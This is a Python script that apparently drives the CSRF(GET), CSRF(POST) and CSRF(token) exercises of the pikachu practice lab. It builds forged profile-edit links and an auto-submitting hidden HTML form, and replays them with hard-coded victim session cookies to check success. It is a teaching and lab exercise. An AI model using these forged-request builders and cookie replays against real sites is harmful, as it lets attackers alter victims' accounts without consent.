pikachu自编CSRF(GET),CSRF(POST),CSRF(token)
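"""Drivers for the pikachu CSRF labs: CSRF(GET), CSRF(POST) and CSRF(token).

Every driver replays the forged profile-edit request *as the victim* (this
script attaches the victim's PHPSESSID itself) and then reloads the profile
page to check that the marker written into the ``add`` field is visible.

NOTE(review): for the GET and POST labs that is a faithful stand-in for the
real attack, where the victim's browser attaches the cookie automatically when
it loads the attacker's link or auto-submitting form.  The token lab is
different: the script first fetches the edit page with the victim's session to
read the fresh token.  A cross-site attacker page cannot read that response
(same-origin policy), so this driver demonstrates why the per-request token
stops CSRF rather than a working bypass of it.

The hard-coded session ids below were captured from one browser session and
must be replaced with the victim's live PHPSESSID before each run.
"""

import html
import re
from urllib.parse import urlencode

BASE_URL = "http://192.168.8.1/pikachu-master"

# Victim session ids used by the original lab runs - refresh them from the
# browser (devtools > Application > Cookies) before running.
GET_SESSION_ID = "df0u2o787mgfgc0avf392ksd7g"
POST_SESSION_ID = "49mmcmofpdtoh0vn7jvkoj13r2"
TOKEN_SESSION_ID = "if9t2mbpc5c5rf83p1slcn7748"

# Seconds before an HTTP call is abandoned; the original calls had no timeout
# and would hang forever on an unreachable lab host.
REQUEST_TIMEOUT = 10

# The token lab renders the current token as a hidden input on the edit page.
_TOKEN_RE = re.compile(r'name="token" value="(.*?)"')


def session_headers(session_id: str) -> dict[str, str]:
    """Return the request headers that present *session_id* as the victim's PHPSESSID."""
    return {"Cookie": f"PHPSESSID={session_id}"}


def build_attack_url(target_url: str, payload: dict[str, str]) -> str:
    """Return *target_url* with *payload* appended as a URL-encoded query string.

    This is the link an attacker would send to the victim for the GET lab;
    urlencode() keeps non-ASCII field values (the Chinese marker) valid in a URL.
    """
    return target_url + "?" + urlencode(payload)


def build_auto_submit_form(action_url: str, fields: dict[str, str]) -> str:
    """Return an HTML page that POSTs *fields* to *action_url* as soon as it loads.

    This is the page an attacker would host for the POST lab (the original
    script built it by hand and left it commented out).  Names and values are
    attribute-escaped so a quote inside a field cannot break the form.
    """
    inputs = "\n".join(
        f'    <input type="hidden" name="{html.escape(name, quote=True)}" '
        f'value="{html.escape(value, quote=True)}">'
        for name, value in fields.items()
    )
    return (
        f'<form action="{html.escape(action_url, quote=True)}" method="POST">\n'
        f"{inputs}\n"
        "</form>\n"
        "<script>document.forms[0].submit()</script>\n"
    )


def extract_token(page_html: str) -> str:
    """Return the anti-CSRF token embedded in the token lab's edit page.

    Raises:
        ValueError: the page carries no token field (typically an expired
            session that was redirected to the login page).  The original
            called ``.group(1)`` on the raw match and crashed with
            AttributeError instead.
    """
    match = _TOKEN_RE.search(page_html)
    if match is None:
        raise ValueError("no token field found in the edit page - is the session still valid?")
    return match.group(1)


def csrf_get(base_url: str = BASE_URL, session_id: str = GET_SESSION_ID) -> bool:
    """Run the CSRF(GET) lab: forge the edit request via the query string.

    Prints the link that would be sent to the victim, replays it with the
    victim's session and returns whether the marker shows up on the profile page.
    """
    # Third-party; imported here so the pure helpers above stay importable without it.
    import requests

    target_url = f"{base_url}/vul/csrf/csrfget/csrf_get_edit.php"
    check_url = f"{base_url}/vul/csrf/csrfget/csrf_get.php"  # used to verify the change
    payload = {
        "sex": "girl",
        "phonenum": "123456",
        "add": "CSRF执行成功",
        "email": "123.COM",
        "submit": "submit",
    }
    print(f"需要发送给用户的链接为:{build_attack_url(target_url, payload)}")

    # Simulate the victim clicking the crafted link while logged in.
    headers = session_headers(session_id)
    requests.get(target_url, params=payload, headers=headers, timeout=REQUEST_TIMEOUT)
    resp = requests.get(check_url, headers=headers, timeout=REQUEST_TIMEOUT)
    print("[+] 注入完成")
    succeeded = payload["add"] in resp.text
    print("[+] 检查注入是否成功: ", succeeded)
    return succeeded


def csrf_post(base_url: str = BASE_URL, session_id: str = POST_SESSION_ID) -> bool:
    """Run the CSRF(POST) lab: same as the GET lab but the edit is a form POST.

    Returns whether the forged values show up on the victim's profile page.
    """
    import requests  # see csrf_get

    target_url = f"{base_url}/vul/csrf/csrfpost/csrf_post_edit.php"
    get_url = f"{base_url}/vul/csrf/csrfpost/csrf_post.php"
    payload = {
        "sex": "girl",
        "phonenum": "123456",
        "add": "CSRF的POST攻击",
        "email": "qq.com",
        "submit": "submit",
    }

    # Simulate the victim's browser auto-submitting the attacker's form.
    headers = session_headers(session_id)
    requests.post(target_url, data=payload, headers=headers, timeout=REQUEST_TIMEOUT)
    resp = requests.get(get_url, headers=headers, timeout=REQUEST_TIMEOUT)
    print("[+] 攻击完成")
    # The original only looked for the phone number, which unrelated page text
    # could also contain; require the unique `add` marker as well.
    succeeded = payload["phonenum"] in resp.text and payload["add"] in resp.text
    if succeeded:
        print("[+] 查看是否注入成功")
    else:
        print("[-] 注入失败")
    return succeeded


def csrf_token(base_url: str = BASE_URL, session_id: str = TOKEN_SESSION_ID) -> bool:
    """Run the CSRF(token) lab: the edit is only accepted with the live token.

    The token is read from the edit page *with the victim's session*, which is
    exactly what a cross-site attacker cannot do - see the module docstring.

    Returns whether the marker shows up on the profile page.

    Raises:
        ValueError: the edit page carried no token (see extract_token).
    """
    import requests  # see csrf_get

    target_url = f"{base_url}/vul/csrf/csrftoken/token_get_edit.php"
    get_url = f"{base_url}/vul/csrf/csrftoken/token_get.php"
    headers = session_headers(session_id)

    session = requests.Session()
    session.get(get_url, headers=headers, timeout=REQUEST_TIMEOUT)
    edit_page = session.get(target_url, headers=headers, timeout=REQUEST_TIMEOUT)
    token = extract_token(edit_page.text)
    print(f"[+] 已获取实时Token:{token}")

    payload = {
        "sex": "girl",
        "phonenum": "123456",
        "add": "CSRF-token",
        "email": "321qq.com",
        "token": token,
        "submit": "submit",
    }
    # NOTE(review): the original draft also built a GET URL
    # (target_url + "?" + urlencode(payload)) for this lab; if the edit
    # endpoint reads its fields from the query string, send them with
    # `params=` instead of `data=` - TODO confirm against the lab source.
    session.post(target_url, data=payload, headers=headers, timeout=REQUEST_TIMEOUT)
    resp = session.get(get_url, headers=headers, timeout=REQUEST_TIMEOUT)
    print("[+] 注入成功")
    succeeded = payload["add"] in resp.text
    print("[+] 检查测是否正常注入: ", succeeded)
    return succeeded


if __name__ == "__main__":
    csrf_get()
    csrf_post()
    csrf_token()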